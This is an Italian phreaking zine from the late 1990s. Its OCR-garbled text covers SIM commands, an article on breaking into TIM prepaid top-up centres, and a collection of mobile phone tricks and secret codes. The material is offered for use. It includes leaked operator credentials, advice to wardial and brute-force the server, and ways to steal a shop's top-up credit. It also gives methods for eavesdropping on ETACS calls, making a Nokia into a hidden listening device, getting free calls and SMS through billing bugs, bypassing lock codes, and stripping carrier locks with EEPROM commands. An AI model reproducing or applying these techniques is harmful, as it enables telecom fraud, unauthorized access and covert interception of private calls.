Kc è ustao per criptare i dati tra MS e BS con l'algoritmo A5 che è contenuto nel telefono (può 
essere regolarmente modificato) 

Quando la rete vuole verificare l'utente, un numero casuale a 128 bit (RAND) viene mandato alla 
SIM. Inviando il RAND e il Ki nell'algoritmo A£, viene generata la risposta 'firmata' a 32 bit 
(SRED) che viene reinviata alla rete per la verifica. 

Una SIM card deve avere 6 connettori per interfacciarsi ad un GSM. 


: Gnd (Terra) 

: Programming voltage 
: Data I/O 

NC 


PIOTAON 


Qualche nota sui comandi SIM: 
- A0F2 00 00 19 (Read status) darà F2 + (25 bytes di dati) 


1-4 Riservata 

5 Identificatore tipo directory (3F= root/7F = altro) 

6 Sub-identificatore (00= root / 01= applicazione) 

7-12 riservate 

13 Numerodibyte che seguono (di solito 0C) 

14-18 Riservata 

19  PINstatus (un piccolo nibble mostra il numero di tentativi rimanenti) 
20  SPIN(PUK) status (come sopra) 

21-25 riservata 


il numero di tentativi di default è 3 per il PIN e 10 per il PUK 

- AO 20 00 08 (Verify PIN) seguito da un pin di8 digit (1234= 31 32 33 34 FF FF FF FF ) 
darà: 

90 00 Fine normale 

6B 00 P1/P2 sbagliato 


67 08 P3 Sbagliato 
98 08 Contraddizione col PIN Status 


98 04 Codice segreto errato 

98 40 Codice segreto errato - Istruzione bloccata! 

92 0x Aggiornamento avvenuto dopo x tentativi 

92 40 Aggiornamento impossibile (EPROM della scheda difettosa) 


- AO AA (select) 


- A0 BO (Read Binary) 


4.4 Funzionamento di un centro ricariche Timmy 


DISCLAIMER : 

Non sono responsabile, non so niente, non ho visto niente, non mi rompete 
i coglioni, non lo ho scritto io etc....... 

Ci siamo capiti !!!!! :-) 


Allora, eccomi qui ad illustrare il funzionamento dei Centri Tim e piu' 
in particolare la questione della ricarica dei Timmy. 


I Centri TIM, per poter effettuare tutte le procedure necessarie alla 
registrazione dei contratti e alla ricarica, si collegano via Modem ad 
un computer centrale della TIM con cui scambiano dati, informazioni, 
foto porno ehm, vabbe' ci siamo capiti. 


Il collegamento viene effettuato con PC montanti (ah siih... :-)) Windows 3.1 
e il software dei nostri sogni: Point of Sale v2.X (dove X e' 3 o 6, la 
versione cambia a seconda del menu' in cui siete, penso che questo bug, 
chiamiamolo cosi', sia dovuto ad un attacco di pazzia del programmatore), 
altrimenti detto anche SID (non conosco il significato della sigla); 

parliamo un attimo del collegamento: 


- Connessione a 14400 

- Connessione di tipo PPP (cosi' riporta il sw di collegamento gia' incluso 
nel PoS, sembrerebbe che venga usato anche un driver FTP ma non ci giuro) 
- Connessione su un bel green: 167-295XX3 (Vi piacerebbe sapere il numero, 
eh, e invece vi lascio come compito a casa, un sano wardialing x trovarlo!) 
(Tale numero se non erro dovrebbe avere 2 nodi: Trieste e Roma) 


Una volta connessi parte una serie di autenticazioni, che x quanto ho visto 
sono strutturate su tre livelli: 


1- Autenticazione iniziale (Come riportato dal log della connessione del sw 
di collegamento col modem) cioe' mi spiego esce 'na roba tipo questa: 


ATX3DT167295XX3 

Connesso a 14400 LAPCM 

VERIFICA DEI DATI DELLA POSTAZIONE IN CORSO 
Autenticazione effettuata 


Di questa autenticazione non so come possa funzionare, presumo che sia qcosa 
a livello o hardware oppure qcosa sull' HD tipo serial (quindi cazzuta). 


2- Autenticazione Intermedia: questa avviene a collegamento effettuato gia' 
all'interno del sw PoS ed ho scoperto che login e password sono 
rispettivamente OPERATORE e TELECOM2 (penso potrebbero andare anche 
TELECOMI1 o TELECOM, non so, e dovrebbe essere "NON CASE SENSITIVE"). 


3- Autenticazione finale, o del punto vendita: qui il punto vendita mette 
il suo login e pwd ed infatti una volta connessi nel PoS si vede il nome 
del negozio. 


Per questo motivo quindi si puo' capire che si rischia di inculare il negozio 
e non tanto la TIM, anche perche' la ricarica, cosa che interessa 
maggiormente, avviene in questo modo: 


Il Centro TIM XYZ chiede alla TIM di "caricare" sul suo account x es. 200 
ricariche da 50karte, che poi vanno a scalare durante l'utilizzo, quindi 

se x es. noi entrassimo con l/p del negozio XYZ gli fottiamo delle ricariche 
e inculiamo lui, non la TIM (Se volete fate pure voi disquisizioni del tipo 

"il punto vendita non c'entra", "meglio lui che noi, tanto sono pieni di 
soldi", "tua mamma e' una X)("!H£"!/)" etc...). 


Osservazione MOLTO IMPORTANTE: da quello che ho scoperto posso dire queste 
tre cose che rendono un hack molto piu' difficile (Come se gia' non lo fosse): 


- LE DOPPIE ENTRATE VENGONO SEGNALATE: se qualcuno e' gia' dentro con login 
A e pwd B e un altro cerca di entrare con le stesse il terminale segnala 

a quest'ultimo che "l'allocazione e' gia' stata effettuata" 

(o 'na cosa simile) e quindi non riesce ad entrare. 


- LA LINEA NON E' ATTIVA TUTTO IL GIORNO ma viene attivata solo negli orari 
di apertura dei negozi quindi scordatevi di collegarvi alle 2 di notte per 

evitare la doppia entrata, penso che la disattivino alle 21 (o forse cambia 

a seconda del negozio e di quanto sta aperto). 


Mi viene inoltre segnalato da un membro del gruppo SOftProject che: 


- LA LINEA NON E' ATTIVA DURANTE TUTTO L'ANNO o forse intende NON FUNZIONA 
TUTTI | GIORNI (tipo a Natale penso che non vi permettano di accedere). 


Una volta collegati ci si trova in un bel menu' con servizio prepagato, 
contratti e tutto quello che volete; la ricarica funziona in modo molto 
semplice (non ricordo l'ordine esatto): 


- Si inserisce numero di telefono da ricaricare. 


- Si inseriscono i dati di chi ricarica (non e' assolutamente necessario 

che corrispondano con l'intestatario del numero) cioe' codice fiscale 

e se e' gia' presente tra le persone che hanno ricaricato escono gia' i dati 
della persona altrimenti vengono chiesti nome, cognome.... vabbe' cque un 
lavoro da GenerlD v2.2 :-)) 


-Si sceglie quanto ricaricare 
FATTO!!! 


P.S.: Non bisogna inserire nessuno codice segreto, PIN, PUK o salcazzo cosa 
altro, basta il numero infatti se x caso l'operatore sbaglia e ricarica il 

telefono sbagliato, sono solo cazzi dell'utente (non puo' essere neanche 
rimborsato ed e' alquanto difficile risalire a colui cui e' stato ricaricato 

per sbaglio); per questo apro una parentesi: 


PROPRIO PER QUESTO MOTIVO, RITENGO CHE SE IO RICARICO IL TELEFONO A GIACOMINO 
FACENDOGLI PAGARE UN PO' DI MENO, E LA TIM GLI ROMPE I COGLIONI 

(COSA DIFFICILE TRANNE SE SI ACCORGE CHE E' STATO FATTO ILLEGALMENTE) LUI 

PUO' BENISSIMO DIRE: "CHE CAZZO VOLETE DA ME, NON MI ROMPETE I COGLIONI, 
AVRETE FATTO UNO SBAGLIO VOI O QUALCHE DEFICIENTE HA RICARICATO IL MIO 
TELEFONINO AL POSTO DEL SUO, ANDATE A CAGARE BASTARDI RINCOGLIONITI !!!" 


O magari anche con parole piu' delicate, comunque ho reso l'idea. 


Ora vi allego qui sotto le considerazioni di un amico che ha provato via 


centralina meccanica una "penetratio" del green, troverete anche alcuni 
miei commenti con c:\cavallo> prima :-) 


step one: trying to access on a telecom server, chapter 1 
ovvero come farsi beccare e finire in galera..... (speriamo di no) 


In data XXXXX tentavo di collegarmi al numero ricevuto dal cielo e constatavo 
con (non ti dico quanta) sorpresa che il terminale, una volta in carrier 

detect, non fa semplicemente un cazzo. 

Se ne sta zitto, non ti dice niente, non comunica nulla e sulla linea c'e' SOLO 
ED ESCLUSIVAMENTE la portante (la portante e' quella forma d'onda che viene 
modulata sulla linea e che serve per "portare" (cazzo, strano!) i segnali veri 

e propri e che mantiene il collegamento anche senza l'invio di dati.) 
Praticamente e' in modo originate e non in answer, almeno suppongo. 

E' come se ti stesse chiamando lui. 

Procedendo ai tentativi piu' svariati, ho constatato che: 


Il server se ne sta in attesa, aspettando "qualcosa", magari il seriale 
tanto nominato, oppure aspetta di sapere che tipo di terminale si sta 
collegando (magari e' usato anche da altre aziende per altre cose, non so) 
con i soliti enter doppio space, ed esc, ti sconnette. 

Solo enter o solo esc ti sconnette. 

Pero' ti fa scrivere quello che vuoi, chiaramente non restituisce l'echo 

dei caratteri, e quando dai l'invio ti sconnette probabilente per la pass 
sbagliata od il seriale scazzato. 


Riassumendo: 

IL TERMINALE, PUR NON COMUNICANDOTELO, VUOLE UNA PASSWORD O UNO USERID 
OPPURE 

NECESSITA DI SAPERE CHI E' DALLA'ALTRA PARTE. 


Immagina di essere un informatore e di dover comunicare informazioni riservate 
ad un altro tizio del cazzo. 

Sicuramente non andrai in giro a dire "Oh, io devo dire un'informazione 
riservata!, c'e' mica il tizio che cerco?? ehi?? mi sentite??" 


Te ne staresti zitto, e aspetteresti che il tizio ti venga a dire "SONO IO, 
DIMMI TUTTO". 
Questo e' quello che fa il server laggiu' alla telecom. 


Ma come stracazzo fare per sapere COSA vuole, quante pass, quanti id, 

1 alla volta? 2 alla volta? boh? un brute force potrebbe essere l'unica cosa, 
ma su quali basi compilare la sorgente per le pw? 

In che ordine fornirle? 

Non credo che siano solo robe come admin, root, sysop, etc.., ma robe come 
9255uibgilojh5giu5gpi32u5gk32jhvrljehfbvd9pc7t\ 

(per il seriale della postazione, si intende). 

Con un server che ti prende per il culo e ti riattacca in faccia appena 

scazzi, e' un'impresa. 


Mi sa che si ritorna al seriale della "postazione", l'unica cosa che forse, 


CREDO CHE LO POSSA CONFIGURARE SOLO L'ASSISTENZA 


Infatti ieri stavo pensando che la telecom non puo' essere cosi' stupida 
da non considerare che su 300 (ipotizziamo) centri di ricariche in italia, 
almeno 1 abbia un'operatore che ne puo' capire qualcosina di hacking e 
phreaking.. 


Allora, diciamo che si siano prevenuti, e si siano attrezzati: 

lo avrei scelto i modi piu' sicuri per farlo: 

1- Farsi un software fuori standard. 

2- Utilizzare per l'invio e la ricezione due protocolli diversi: ppp / ftp . 
Gestire l'invio dei dati in maniera complessa: (I'ftp di cui parlavi, credo 
serva proprio per questo) loro si collegano, il software inizia la 
negoziazione, senza il sw la connessione non prosegue nemmeno. 
Una volta connessi il server resta in attesa dei dati che vengono poi spediti 
in FTP! Poi aperti, elaborati etc.. e roba varia.. 

Quindi bisogna pensare ad una vera e propria DOPPIA connessione 
PPP-TCPIIP,FTP! 

E a questo punto, io direi MEFEEERDDDDA. 


3- E NON MENO IMPORTANTE, LA STORIA DI "VERIFICA DEI DATI DELLA POSTAZIONE 
IN CORSO" MI FA VENIRE IN MENTE QUALCOSINA... HAI PRESENTE UN BEL TRACE 
FATTO PERBENINO CHE SE IL NUMERO TELEFONICO NON E' QUELLO DEL CENTRO TIM 


c:\cavallo> Secondo me questa e' 'na cosa un po' esagerata, non arriviamo a 
livelli X-Files, forse puo' essere pero' una cosa simile ai servizi fax on 
demand), il centro TIM inserita la password viene poi automaticamente 
richiamato dal server che stabilisce la comunicazione. 


P.S.: 

LE INFO NON VENGONO INVIATE IN TEMPO REALE PERCHE' QUANDO HANNO FINITO DI 
INSERIRE I DATI, TI CHIEDONO "TUTTO A POSTO, VADO?" E PREMONO IL 

PULSANTE PER INVIARE... 


c:\cavallo> Questa e' una cazzata, i dati vengono si' inviati in tempo reale 
anche perche' x esempio quando metti il codice fiscale il terminale si mette 
a lavorare e dopo un po' ti restituisce i dati della persona (se presente) 
presi dal database di Sorella TIM. 


Non ho mai visto un server ftp che richiede 2 pw. quando hai l'accesso 
root, o ce l'hai o non ce l'hai E SERVE UNA SOLA PW. 


c:\cavallo> Fino a qui ci arrivo anche io, ma chi ci dice che e' un vero 
ftp? potrebbe, anzi sicuramente e', essere un sw dedicato!! 


Quindi e' ipotizzabile: 

una connessione tcplip "rigirata" (difficile connettersi, perche' tutti pensano 
che il server non risponda e invece devi essere tu a farlo, sono configurazioni 
che pochi si ricordano, ormai lo standard le ha cancellate..), cioe' tu in modo 
answer e lui in originate (sono delle configurazioni dei modem), con una 
autenticazione di sw, numero tel. (cazzo!) e poi di user. 


Il server poi potrebbe comunicare al software (eventualmente) l'algoritmo "del 
giorno" (piu' sicuro cambiarlo una volta al giorno) per quanto riguarda 
l'impacchettamento dei dati rigurardanti l'utente. 


Poi, effettuato l'inserimento, il sw fa un calcolino secondo il suddetto 
algoritmo, richiede di poter inviare, il terminale "devia" in ftp e invia il 
tutto al server (mooolto complesso). 


Il server lo apre, (tipo un mailer door) lo elabora e ti accredita il tutto. 


Questa elaborazione, etc.. spiega il leggero ritardo di accredito. 


E' Tutto, carissimi compari, fate buon uso di queste infos. 
L'uomo chiamato Cavallo 
P.S.: Evitate di Postare questo articolo sui NewsGroup. 


Cavallo De Cavallis [SOftPj98] 


4.5 Trucchettini e curiosità varie 
In questa sezione raccogliamo tutti i trucchettini che ci mandate 
4.5.1 Trasformare un Etacs in uno scanner 


E' una cosa semplicissima intercettare chiamate di etacs dato il fatto che i segnali radio 
dell'etacs non hanno alcun tipo di decodifica. Il miglior modo per farlo è usare uno 
scanner ma anche un telefonino va piu' che bene. Ogni telefonino infatti è un potenziale 
scanner visto che ha al suo interno una ricetrasmittente sui 900 Mhz. Ora basta 
bypassare le funzioni standards del telefono per utilizzare questa ricetrasmittente come 
ci pare. lo , avendo il motorola , so come fare solo su questo telefonino ma sicuramente 
anche con altri è possibile fare cose del genere. Ecco le istruzioni da seguire se avete 
un motorola etacs 


Aprire la batteria e verificare che ci siano tre contatti sul telefono e che il contatto 
centrale sia leggermente un po' piu' abbassato degli altri due esterni. 


Verificato cio' mettete un pezzettino di stagnola sul contatto centrale e quindi reinserite 
la batteria. 


Riaccendete il telefono e no panik! Il vostro teleofnino comincera' a scrivere strani 
numeri sul display , ora è entrato in Test-mode! Premete cancelletto e vedrete la scritta 
Tac5 sul display. Poi scrivete 08 e quindi di nuovo cancelletto. 


Il vostro telefonino si è trasformato quindi in uno scanner! Scrivete un canale radio 
compreso entro 1101 e 1199 e premete cancelletto una volta finito di scrivere il canale e 
potrete sentire tutte le telefonate che vengono fatte nella cella in cui vi trovate! ES: per 
ascoltare le chiamate che vengono fatta nel canale 1120 dovrete digitare 1120#. 


4.5.2 Le ultime 1000 lire 
di Chatrobot 


Se siete rimasti con sole mille lire nella scheda del vostro ricaricabile fate l'ultima 
telefonata e potrete parlare anche per cinquanta ore!! 


4.5.3 Segreterie comunque 
di Chatrobot 


La tua fidanzata lascia il telefonino staccato senza segreteria telefonica e tu stai 
provando da 3 ore a chiamarla senza successo? O vuoi semplicemente riempire la 
segreteria telefonica del cellulare di un tuo conoscente con spernacchiate varie, ma non 
ha la segreteria abilitata? 

Ebbene, puoi mandare messaggi alle segreterie telefoniche degli utenti GSM - anche se 
non hanno abilitato il servizio -. 

Come? Il principio e' in realta' semplicissimo. 

L'abilitazione della segreteria telefonica cellulare in realta' non e' altro che una 
deviazione delle chiamate in arrivo verso un secondo numero, molto simile al proprio 
numero di telefono. 


Chiamata ---> Numero 1 ---> Numero 2 
(Cellulare) (Segreteria) 


Dunque, se con un altro cellulare GSM chiamiamo DIRETTAMENTE il secondo numero, 
quello della segreteria, potremo accedere al servizio, anche se l'utente non ha attivato la 
deviazione chiamate verso quell'altro numero! Quando l'utente accendera' il cellulare, 
ricevera' un messaggio SMS che lo avvertira' della presenza di un certo numero di 
messaggi nella segreteria. 

Ecco a quali numeri telefonare: 


Per i cellulari TIM: 
Prefisso / 55 | Numero 


Per i cellulari OMNITEL: 
Prefisso / 20 | Numero 


4.5.4 Trucchi col trasferimento Omnitel 
di Telecomico 


con le carte ricaricarbili omnitel chi setta il trasferimento di chiamata non lo paga. 
Quindi si puo' utilizzare accoppiato ad un abbonamento con you & me rifemento quella 
ricaricabile (non so se e' ancora possibile fare you & me con ricaricabili), puoi chiamare 
chiunque a tariffa bassa! 

fino a mesi fa si'.. non io personalemnte... comunque il trasferimento gratuito l'ho 
verificato di 

persona... 

alcuni dicono che se ne abusi allora te lo fanno pagare... boh... 


4.5.5 Rendere ricaricabili i Nec p7 a sbafo! 
di Space Navigator 


Un modo per rendere i Nec p7 ricaricabili senza pagare i centri di assistenza (lo so, non 
c'entra niente con la Telecom, ma almeno puo' essere considerato un po' 
phreaking....):Accendi il telefono e digiti ... 


*26041969# F MR 76 MR # 01 MR # 71 


adesso sei entrato nel NAM-1 ovvero nella programmazione della linea N.1, (il NEC 
supporta 4 linee telefoniche sullo stesso telefono, Tim ovviamente no).Puoi scorrere i 
vari settaggi premendo il tasto #. 

Quando arrivi alla voce EMERGENZA *** al posto dei tre * inserisci il munero 314 e 
continui con #, ti si attiva una voce supplementare Cambio-PIN, la setti a SI e completi il 
giro con #. 

Per memorizzare il tutto esci con C prolungato che ti riporta in TEST-MODE e esci con 
MR # 02. 

Adesso battendo F6 + il tuo numero di blocco ti si e' attivato il sottomenu 6xxxx8 dove 
chi autentica il telefono inserira' il numerone al cifre. 

ATTENZIONE: TUTTI i NEC P7 hanno questa procedura, ANCHE QUELLI CHE NON E' 
POSSIBILE CONVERTIRE A RICARICABILI per un bug software. 


4.5.6 Bug Ericsson 688 
di Scanman 


questo dovrebbe essere un trucco per chiamare gratis (se il network gsm lo consente - 
credo che sia un bug) 


Chiama un numero, aspetta finchè "connecting" appare scritto sul display poi premi: 
CLR, 0, #, 

(a questo punto appare la parola ‘auto sul display) 

poi NO e poi di nuovo NO (per spegnere il telefonino) 


E vedrai che così il telefono sarà spento ma la luce verde sarà ancora accesa e che 
potrai parlare nonostante il telefono sia spento. 
Per spegnere il telefono dovrai togliere la batteria. 


4.5.7 Bug del Motorola 7500 


Prendete un telefono cellulare MOTOROLA 7500 e alzate il volume dello squillo e della 
ricezione al max, poi tramite le funzioni del menu' disattivate lo squillo del telefono......a 
questo punto con un 

normale telefono di casa o un telefono di una cabina chiamate il numero del 
MOTOROLA 7500 (mi raccomando non rispondete con il MOTOROLA !!! fatelo squillare 
liberamente !!) mentre il telefono con cui stiamo chiamando il cellulare emette il segnale 
di libero, provate a parlare normalmente....sul motorola (che indica sul display lo 
squillo....mi raccomando non aprite lo sportellino) si sente pari pari la voce della 
persona all'altro capo !!! Naturalmente nessun addebito in merito...visto che il telefonino 
non viene aperto....quindi e' possibile parlare in una direzione in modo gratuito... Questo 
trucco funziona su tutti i motorola 7500 che io ho provato.....e su alcuni 7200, sul 8700 


4.5.8 Cellulari in TV 
di Ulixes 


Allora, da qualche parte dovrò pur cominciare...... 

Ho trovato un interessante falla per ascoltare su normali vecchi televisori manuali le 
chiamate dei telefoni cellulari. | canali TV UHF 70-83 sono quelli su cui bisognerà 
sintonizzare il TV per poter origliare. 

La sensività non è delle migliori, tranne se non si è in città o in luoghi sensibili a quelle 
comunicazioni. 


PS non se se ciò che è stato descritto è illegale o meno, ma vi assicuro che funziona 
alla meraviglia. 


4.5.9 SMS Gratis 
di Pietro 


Provate ad impostare come SMSC +4792001000 (Netcom) ed ad inviare un SMS verso un 
utente TIM.Risultato: su alcuni numeri (il mio per esempio, ho la Tim Card!) dopo circa 
30 secondi viene fuori "Messaggio non inviato" ... ma il messaggio ha già raggiunto il 


destinatario ed io non ho pagato una lira!N.B: Da TIM CARD mia a numeri TIM = OK, da 
mio Libero a numeri TIM = OK ma non da quello della mia ragazza, lì dice subito 
"Messaggio non inviato" e non arriva nulla.Fate qualche prova e fatemi sapere. 


4.5.10 SMS e bug OPI 
di Blum 


SMS 

Sembra che usando il +491722270300 per spedire SMS non si spenda niente, 
però non ne sono assolutamente certo. Inoltre sembra che con alcune schede 
funzioni tipo la Personal 195 e con altre no tipo la Personal City 


BUG OPI 

Se si ha una una scheda prepagata OPI e si arriva a 0 lire di credito 

sembra che ti permetta comunque di spedire SMS chiaramente a sbaffo (credo 
comunque un massimo di 10 dopo di che tenta di fare l'addebito e dovrebbe 
disabilitare la scheda) 


4.5.11 Chiamare gratis con gli Ericsson 
di CDP 


Utilizzando una scheda prepagata GSM OMNITEL (con TIM gli scatti vengono 
conteggiati... occhio!) ed un telefono Ericsson è possibile, a quanto pare, chiamare a 
scrocco, almeno fino a quando non vi bloccheranno la SIM (ragionevolmente dopo 
una settimana di uso intenso del trucco, anche se conosco gente che ha scroccato 
per anche 2 settimane). 

Ericsson GH688 


Chiama un numero, aspetta finchè "connecting" appare scritto sul display poi premi: 
CLR, 

0, 

#, (a questo punto appare la parola ‘auto sul display) 

poi NO e poi di nuovo NO (per spegnere il telefonino) 


E vedrai che così il telefono sarà spento ma la luce verde sarà ancora accesa e che 
potrai parlare nonostante il telefono sia spento. 

Per spegnere il telefono dovrai togliere la batteria. 

Sui nuovi modelli bisogna tenere premuto NO senza lasciarlo (la seconda volta) 
altrimenti il cello si spegne. 

Ericsson Gf788e 

Comporre il numero poi subito: 

CLR, 

NO 

e poi NO tenendolo premuto. 

Per il GF 788 dovrebbe funzionare quello del Gh688. 

Ericsson GA628 

Comporre il numero e poi: 


CLR, 

NO fino a spegnere il telefono. 

Nei vecchi telefoni il NO può essere rilasciato mentre per i nuovi bisogna tenerlo 
premuto. 


4.5.12 5110/6110 Spione 
di Blum 


Cortocircuita i pin 3 e 4 di un Nokia 5110 o 6110, ti apparirà la scritta "con auricolare". 
Imposta la suoneria a NO e risposta automatica a SI. 

Hai cosi' ottenuto un apparecchio che, in automatico e silenziosamente, risponderà 
alle tue chiamate, a ti invierà quello che "sente" nell'ambiente..... 


Disegno dei pin di un 5110 


tastiera 


| 

| 102 | 
| x3456789x | 
| 


batteria 


4.5.13 Possibile bug 8700 
di Blum 


Tramite un procedura semplice si può conoscere il codice blocco del telefono. 
Quando appare la scritta Cod Blocco basta premere Menu, andare in cambio 
codice blocco e digitare 0000. 

Ecco tutto. 


4.6 Codici segreti di cellulari GSM 


Questa sezione raccoglie tutti i codici segreti per intervenire sulle impostazioni avanzate dei 
cellulari GSM divisi per casa di produzione. Tutti i codici sono stati estratti da Mobileworld e da 
altri siti, e tradotti da CDP. 


4.6.1 Alcatel 


Alcatel One Touch Easy 


Scrivere 000000 e premere * 

Appare: Secret Menu 

TRACES Menù idicatori canale 

ARRETS - ? 

VIDER ARRETS Premere OK e il telefono risponde: This action is executed! 

CTRL CHARGE Mostra il voltaggio del caricabatterie e della batteria. 

DAMIER Mostra test 

Il Master Code per il "MENU code" e il "Prod. code" dell' Alcatel One Touch Easy è 
25228353. 

So che V13 e V14 vengono mostrati alla fine di *#06#. Nellla versione V13, una novità è 
che viene mostrata una "-" alla fine della linea del display per le parole lunghe. 


Alcatel Mobile Phones 


Molti di questi telefoni hanno I'SP lock, possono cioè essere usati solo con certi 
fornitori di servizio. Questa funzione può essere disattivata solo chiedendo il codice 
speciale all'Alcatel stessa o al fornitore del servizio (TIM o OMNITEL in Italia). Si dice 
che esiste un programma che permette di risalire a questo codice a partire dall'IMEI. 
Questa notizia non è verificata. 

IMEI 3300 1453 1139 420 

Se attivato con una scheda TELSTRA, il telefono si avvia con un: 

"PRODUCT CODE" 

"VAL. => OK" 

Quindi si inserisce 025121992 OK 

"ENTER SPECIAL CODE" 

**05* come i Motorola 

"UNBLOCKING" 

"PUK ?" 

10608CC2*. Anche questi due da Vodaphone funzionano 906081C2* 15900807* 
"UNBLOCKING" 


"PIN ?" 

0000* 
"UNBLOCKING" 
"PIN AGAIN " 
0000# 


Sembra che debba trovare il PIN Perchè a questo punto il telefono si riavvia 


Software releases 


HC400 sul retro ha uno sticker con su l'IMEI e la versione software. L'Alcatel ha così 
diviso | versioni software: 

1.x senza Cellbroadcast 

5.x con Cell broadcast 

la più recente software release dell' HC 1000 è la AK1 03 


Alcatel HC600/800/1000 


*#06# IMEI e Software Version (escluso HC600). 

Questi sono i pinout dell' HC600 gli stessi dell' 800/1000 credo. 
13579111315 
Le I I 

O O 17 
Le I e 

2 4 6 810121416 


1 Vbat_ext 9 SDA E 

2 EMMI_PAE 10 GND 

3 Mic 11 GND 

4 EMMI_OPE 12 DC_IN (charge) 
5 GND 13 Speaker 

6 EXT_EMET 14 MARCHE 
7SCL E 15 DC_IN (charge) 
8 EXT_RECDIT 16 GND 


17 Antenna+internal switch (int/ext) 
4.6.2 Ericsson 


ERICSSON 198 

Per vedere l' IMEI: *#06# 

Per resettare i timer 904060 <FUNCTION> <FUNCTION> SEND 

Per ativare le modalità di Programmazione 923885 <FUNCTION> <FUNCTION>. 
Potreste dover inserire questi codici con il tasto funzione premuto. 


ERICSSON 218/337 

Per vedere l' IMEI: *#06# 

Per vedere la versione del Software: -> * <- <- * <- * CLR (Fare attenzione) 

Per attivare I'SP lock <- * * <- (Permette di usare la SIM sono con un gestore di telefonia) 
Premere Yes per bloccare e No per sbloccare. Per disattivare questa funzione potete 
anche usare i codici qui sotto. USATE A VOSTRO RISCHIO E PERICOLO 

Almeno sul 337 c'è un sottomenù: Enter SPCK-code. Ci sono 5 possibilità, e vengono 
mostrate (05 attempts). All'ultima possibilità il telefon suona per avvertirvi, ‘this is the 
final try', quando entrate nel menu'... Un codice errato fa uscire dal menù, così da non 
farvi restare bloccati... quando sbagliate il codice per 5 volte il menù viene disattivato, e 
verrà mostrata la scrittat: 'Not allowed' quando si digita <-**<- 

Un "secret test mode" può essere raggiundo con un GH337. Dovrebbero esserci due 
modi: 

>*<<*>* software version, come 940810 1310 

>*<<*<* software version, come 951024 1054 

Dopo aver avuto accesso a questo menu, i tasti < e > scorrono il menù. Sembra che ci 
siano diversi menù a seconda della versione del software. 


I numeri delle versioni del software sembrano essere apparentemente una data e orari. 
la versione 940810 1310 ha: 

TEXT CHECK - mostra 254 messaggi 

INIT EEPROM MMI - resetta i settaggi NVRAM (User Settings). 

Altri, probabilmente della versione più recente: 


FLASH - riavvia il telefono al punto dell'inserimento del codice PIN.Non si può 'Killare' 
un 337 premendo YES quando chiede "FLASH?", devi prima collegarlo a 5/12 volts per 
poter cancellare la memoria flash. 


1-ROW TEXTS - scorre 174 messaggi di una linea con i tasti <> 
n-ROW-TEXTS - scorre i messaggi a tutto schermo con < e > 
la versione 950626 1405 ha: 


CXC (number) - Application software's "product number". Il GH337/GF337 è sempre 
"CXC 125 005" 


PRG - Indicazioni per programmare. 


Programmare il 337 

Setttare ComPort a 9600bps, 8 data, 1 stop, no parity. 

Accendere il telefono con "NO/ENDpwr". 

Durante la seguenza di avvio il telefono invierà ">>" 

(ASCII 62 decimal). Entro un secondo, inviare questa sequenza "TP1<CR>". 
(Abbiamo usato il programma PROCOMM PLUS con questo script "eric.asp") 
[proc main ] 

[start: ] 


[ waitfor ">>" ] 

[ pause 1] 

[ transmit "TP141M" ] 

Se tutto è andato bene dovresti ottenere "OK". 


Provate TEST PROGRAM inviando i comandi seguiti da <CR>: 


PROG 0 (Test Program product number info) 
PROG 1 (Test Program product date info) 
PROG 3 (Main Application product number info) 
PROG D (Main Application product date info) 


Programmare la Calcolatrice e il Channel Indicator/RBS 

Per abilitare, inviare: 

EEWR 047A 01 

Aspettare l'OK, Spegnere* e staccare i cavi. Accendere e scorrere i menù. 
Per disabilitare: 

EEWR 047A 00 


Resettare il blocco elettronico 

Per resettare il blocco dovrete cancellare l' EEPROM nel range 045B - 0466 inviando 
questi comandi: 

EEWR 045B 00 

EEWR 045C 00 

EEWR 045D 00 

EEWR 045E 00 

EEWR 045F 00 


NP 


POIAW 


EEWR 0460 00 
EEWR 0461 00 
EEWR 0462 00 
EEWR 0463 00 
EEWR 0464 00 
EEWR 0465 00 
EEWR 0466 00 


Disabilitare il Service Provider Lock 
Per disabilitare inviare: 

EEWR 1587 00 

Per abilitare: 

EEWR 1587 01 


Comandi sperimentali - Usate a vostro rischio 

Per prendere i settaggi del software: 

PREA <bank> <address> <bytestoread> 

Bank range : 00..7F 

Address : 0000..BFFF 

Bytestoread : 0000..BFFF 

I valori in più alla fine sono i checksum per i byte di memoria rstituiti. Il formato sarà 
sempre 0000 e non 00. 

PREA FF 

application checksum, impiega qualche secondo. 


Note sul PH 337 

1. La calcolatrice non è disponibile su tutte le versioni di Software. 

2. Calc/RBS mode non disponibile sui GH337 nelle versioni software precedenti la 
R2A 

3. itentativi SPCK possono essere cambiati da 5 a 50 

4. L'istruzione LIME fa apparire ERR ma non danneggia il telefono. 

5. L'istruzione IMEI restituisce il numero IMEI. 

6. Rispondendo con YES a FLASH? Distrugge l'unità. 


COSE DA PROVARE 
Settare ComPort a 115200bps, 8 data, 1 stop, no parity e vedrete tutti i comandi sullo 
schermo. Fate una chiamata e vedete cosa accade... 


ERICSSON 318/388 

IMEI: *#06# 

Software Version: -> * <- <- * <- * CLR (Fare attenzione) 

L'Ultima versione del software è sotto Phone Info. 

Per regolare bene il suono e eliminare gli eco, mettete il 388 in un kit viva voce HF 2600. 
Chiudete tutte i finestrini, spegnete il motore e digitate * # * # 3. Il telefono si regolerà 
automaticamente in pochi secondi. 

SP lock <- * * <- 


Yes per bloccare e No per non bloccare. 


Programmare la flash di un 388: 
. Connettere il 388 al cavo con un RS232/TTL. 


. Settare Comport a 9600bps, 8 data, 1 stop, no parity. 

. Power ON, attendere "2" e inviare "OB" al telefono. Non premere ENTER. 
. R dovrebbe apparire sullo schermo. 

. inviare pre_xxx.bin al MS. 

. dovrsti ricevere ">". 

. inviare "0B" di nuovo. 

. R dovrebbe apparire sullo schermo 

. inviare prodload.bin al MS. 

10. riceverete ">". 

AI momento non ho i files .bin. Provate su MobileWorld. 


O0ONDODUISWNNHE 


Programmare il Channel Indicator o RBS 

Per abilitare inviare: 

EEWR 3EE 1 

Attendete OK , spegnete* il telefono e scollegate i cavi. Accendete il telefono e scorrete 
tra i menu. 

per disttivareinviare: 

EEWR 3EE 0 


Resettare il blocco elettronico 
Per resettare il blocco dovrete cancellare l' EEPROM nel range 03CF to 03DA inviando 
questi comandi: 

EEWR 3CF 00 

EEWR 3DO 00 

EEWR 3D1 00 

EEWR 3D2 00 

EEWR 3D3 00 

EEWR 3D4 00 

EEWR 3D5 00 

EEWR 3D6 00 

EEWR 3D7 00 

EEWR 3D8 00 

EEWR 3D9 00 

EEWR 3DA 00 


COSE DA PROVARE 

Settare ComPort a 115200bps, 8 data, 1 stop, no parity e vedrete tutti icomandi sullo 
schermo. Fate una chiamata e vedete cosa accade... 

